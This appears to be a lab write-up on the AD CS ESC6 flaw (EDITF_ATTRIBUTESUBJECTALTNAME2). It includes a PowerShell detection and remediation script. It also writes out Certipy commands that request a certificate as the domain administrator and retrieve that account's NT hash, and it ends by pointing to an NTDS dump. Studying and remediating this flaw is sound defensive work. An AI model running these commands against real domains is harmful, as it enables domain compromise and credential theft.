ADCS - ESC6

EDITF_ATTRIBUTESUBJECTALTNAME2 — ESC6

Another way to supply arbitrary SANs, described in a CQure Academy post, involves the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. As Microsoft describes, “If this flag is set on the CA, any request (including when the subject is built from Active Directory®) can have user defined values in the subject alternative name.” This means that ANY template configured for domain authentication that also allows unprivileged users to enroll (e.g., the default User template) can be abused to obtain a certificate that allows us to authenticate as a domain admin (or any other active user/machine). As this Keyfactor post describes, this setting “just makes it work”, which is why it’s likely flipped in many environments by sysadmins who don’t fully understand the security implications.

  • As the Certipy documentation puts it: “ESC6 is when the CA specifies the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. This flag allows the enrollee to specify an arbitrary SAN on all certificates despite a certificate template’s configuration.”

  • Because MARYLAND-CA is vulnerable to ESC6, we can run the ESC1 attack against the default User template instead of the ESC1 template, even though the User template has “Enrollee Supplies Subject” set to false: the CA-level flag overrides the template setting.
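As an added example (not part of the original page), here is a PowerShell check to run on the CA host itself that reads the default policy module's EditFlags value from the registry and reports whether the EDITF_ATTRIBUTESUBJECTALTNAME2 bit (0x40000) is set, followed by the certutil remediation. The CA name MARYLAND-CA comes from the page; the registry path is the standard CertSvc policy-module location, and the script assumes local administrative rights on the CA.

```powershell
# Added example: detect and clear EDITF_ATTRIBUTESUBJECTALTNAME2 on an AD CS CA.
# Run locally on the CA host with administrative rights.
# Bit value taken from Microsoft's EditFlags definition.
$EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x40000

function Test-Esc6Flag {
    param([Parameter(Mandatory)][string]$CaName)
    # Standard location of the default policy module's EditFlags DWORD
    $regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\$CaName\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy"
    $editFlags = (Get-ItemProperty -Path $regPath -Name EditFlags -ErrorAction Stop).EditFlags
    $vulnerable = ($editFlags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) -ne 0
    [pscustomobject]@{
        CA        = $CaName
        EditFlags = ('0x{0:X}' -f $editFlags)
        ESC6      = $vulnerable
    }
}

# Check the CA from the lab above (name taken from the page)
$result = Test-Esc6Flag -CaName 'MARYLAND-CA'
$result | Format-List

if ($result.ESC6) {
    # Remediation: certutil's "-FLAGNAME" form clears only that bit, then the
    # CA service must be restarted so the policy module re-reads its settings.
    certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
    Restart-Service certsvc
    # Re-check after the restart; ESC6 should now be False
    Test-Esc6Flag -CaName 'MARYLAND-CA' | Format-List
}
```

The same value can be read remotely with `certutil -config "salisbury.maryland.local\MARYLAND-CA" -getreg policy\EditFlags`, which lists the flag by name when it is present.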

Find the Vulnerability

sudo certipy find -u joaquin.Pereida@maryland.local -p 'horse' -vulnerable -dc-ip 192.168.56.12 -stdout
certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target salisbury.maryland.local -template User -ca MARYLAND-CA -upn administrator@maryland.local
certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@maryland.local': aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da

Then dump the NTDS database with CME.
